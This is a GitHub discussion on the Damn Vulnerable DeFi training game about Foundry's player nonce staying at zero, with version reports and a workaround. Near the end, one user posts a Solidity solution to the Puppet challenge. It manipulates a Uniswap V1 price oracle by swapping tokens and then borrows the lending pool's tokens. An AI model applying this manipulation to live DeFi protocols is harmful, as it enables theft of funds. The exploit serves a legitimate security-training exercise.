### DISCUSSION TITLE
Nonce does not increment with transactions

### DISCUSSION THREAD

**Discussion by Schereo** [tinchoabbate/damn-vulnerable-defi#57] [Help / Q&A / Troubleshooting]
One of the solution assertions is that the player has not done more than 1 transaction. Somehow the player's nonce is always 0 despite having executed some transactions. For example I've executed `uniswapV1Exchange.tokenToEthSwapInput()` in the test function `test_puppet()` but `vm.getNonce(player)` still results in 0.

**Comment by tinchoabbate** [comment]
Hi @Schereo, thanks for reporting! That's strange. I haven't run into this. Which forge version are you using?

**Reply by Schereo** [reply]
I'm using forge version 0.2.0

**Reply by tinchoabbate** [reply]
Ok, could you run `forge --version` and share the output here? Just to know which exact version within 0.2.0.
In my case, I've tested and solved Damn Vulnerable DeFi with the version specified in the [.devcontainer/Dockerfile](https://github.com/theredguild/damn-vulnerable-defi/blob/v4.0.0/.devcontainer/Dockerfile#L30).

**Reply by Schereo** [reply]
This is the exact version I'm using: forge 0.2.0 (ea2eff9 2024-05-28T00:17:33.396420000Z)

**Comment by KarthikeyaGundumogula** [comment]
same with `Truster` also, the player address Nonce always returns zero, i console loged the `msg.sender` in the `test_truster` function its showing the default sender not the actual player.

**Reply by tinchoabbate** [reply]
Thanks for reporting! Can you share which forge version you're using by running `forge --version`?

**Reply by BBongRu** [reply]
The same here.

`forge 0.2.0 (0116be1 2024-07-09T00:18:45.429480000Z)`

I actually run the same exploit within the given DevContainer and got the same result as well unfortunately. The `forge` version inside the container is `forge 0.2.0 (cafc260 2024-05-02T00:19:43.928046340Z)`

I'm personally wondering why the transaction number assertion is required there.

**Reply by tinchoabbate** [reply]
Thanks for sharing. Strange that's also happening in the devcontainer - I've got solutions working nicely with the devcontainer. I thought the problem would only happen with newer versions of forge. I'll try to debug what's going on in the next days. If any of you happens to find the problem, feel free to report here as well!

> why the transaction number assertion is required there

The idea is to limit the number of transactions the player can execute. Not only because that usually leads to more interesting solutions, but most importantly because in real life executing a rescue in a single transaction could be the only option.

**Reply by letonchanh** [reply]
The same problem happens in `Shards`. When the player deploys a smart contract, his nonce increases to 1, but he can also execute some transactions outside the smart contract without increasing the nonce.

**Reply by Jayanring** [reply]
Same issue with `nonce`, but `prank` only changes `msg.sender` inside contract call.

**Comment by EthanOK** [comment]
@tinchoabbate The same problem happens in NaiveReceiverChallenge. After passing the challenge, I output the log and the result of vm.getNonce(player) is zero. Is it a problem with my forge version?
```
> forge --version                                       
forge 0.2.0 (0116be1 2024-07-09T00:18:45.429480000Z)
```

**Comment by tinchoabbate** [comment]
Thanks all for reporting! Not sure what's going on. I tested it with the forge version specified in the devcontainer and worked. Not sure if this is a bug in newer versions of forge or sth I'm doing wrong to test for this condition. I'll have to debug deeper.
Will update you all here once I have a better idea of what's happening.

**Comment by tinchoabbate** [comment]
Hey everyone, there's already an issue opened in Foundry about this: https://github.com/foundry-rs/foundry/issues/8811

**Comment by CanonicalJP** [comment]
The workaround proposed by Foundry is to use the `--isolated` option to make each tx be executed in a separate EVM context. It looks like that option was not working properly either, solved in https://github.com/foundry-rs/foundry/pull/8878

On the other hand, I created https://github.com/theredguild/damn-vulnerable-defi/pull/77 so that the option is included in the Usage section of the README

**Reply by CanonicalJP** [reply]
Now that I came back to Puppet after this, I'm just wondering if it can actually be resolved in a single transaction...

**Reply by newbie1110l** [reply]
I solved in one tx, but i'm not sure if my solution was correct. I used `vm.startPrank(player);`
<img width="1093" alt="screenshot 1" src="https://github.com/user-attachments/assets/aad91333-14dc-4520-aa1f-afcda65046ee">

**Reply by CanonicalJP** [reply]
Feel free to share the approach you used

**Reply by newbie1110l** [reply]
the rule of the game say **You must always use the player account.** so i feel i am obey the rule
```
    function test_puppet() public checkSolvedByPlayer {
        this.attack();
    }

    function attack() public {

        vm.startPrank(player);

        address uniswapV1ExchangeAddr = address(uniswapV1Exchange);
        token.approve(uniswapV1ExchangeAddr, PLAYER_INITIAL_TOKEN_BALANCE);
        uint256 min_eth = _calculateTokenToEthInputPrice(PLAYER_INITIAL_TOKEN_BALANCE, UNISWAP_INITIAL_TOKEN_RESERVE, UNISWAP_INITIAL_ETH_RESERVE);
        uniswapV1Exchange.tokenToEthSwapInput(PLAYER_INITIAL_TOKEN_BALANCE, min_eth, block.timestamp * 2);
        lendingPool.borrow{value: lendingPool.calculateDepositRequired(POOL_INITIAL_TOKEN_BALANCE)}(POOL_INITIAL_TOKEN_BALANCE, recovery);

        vm.stopPrank();
    }
```

**Reply by CanonicalJP** [reply]
Interesting but not sure if it's too edgy since it'd work only on a test environment. On the other hand, are you using the `--isolated` option when running the test? I'm seeing more than one tx sent by the Player, it may be another bug in the nonce counting.

**Reply by newbie1110l** [reply]
<img width="712" alt="screenshot 1" src="https://github.com/user-attachments/assets/477d9c24-a297-4d6a-a155-e8b7b1a13c7f">

In my env, I'm certain that I have enabled `--isolated`
